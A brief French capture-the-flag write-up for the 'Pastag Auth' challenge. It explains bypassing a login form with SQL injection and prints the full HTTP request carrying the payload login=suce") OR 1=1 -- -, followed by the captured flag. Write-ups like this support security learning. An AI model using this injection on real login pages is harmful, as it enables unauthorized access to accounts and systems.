====== Pastag Auth ====== ===== Overview ===== On trouve une page d'authentification classique, rien de bien méchant. ===== Exploitation ===== La première chose qui passe par la tête c'est une Injection SQL blind qui permettrait de se connecter sans mot de passe. C'est évidemment la bonne solution. On a juste galéré à comprendre qu'il fallait en fait fermer une parenthèse pour exploiter correctement la faille. POST /action.php HTTP/1.1 Host: 54.247.160.116:8008 User-Agent: Firefox/13.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=vhks5uigf3faen5m106125r1j1 Content-Type: application/x-www-form-urlencoded Content-Length: 86 login=suce") OR 1=1 -- -&mdp=suce&token=851300ee84c2b80ed40f51ed26d866fc&cnx=Connexion Flag : **df2f49e1360980b107c376fd2fe245e8**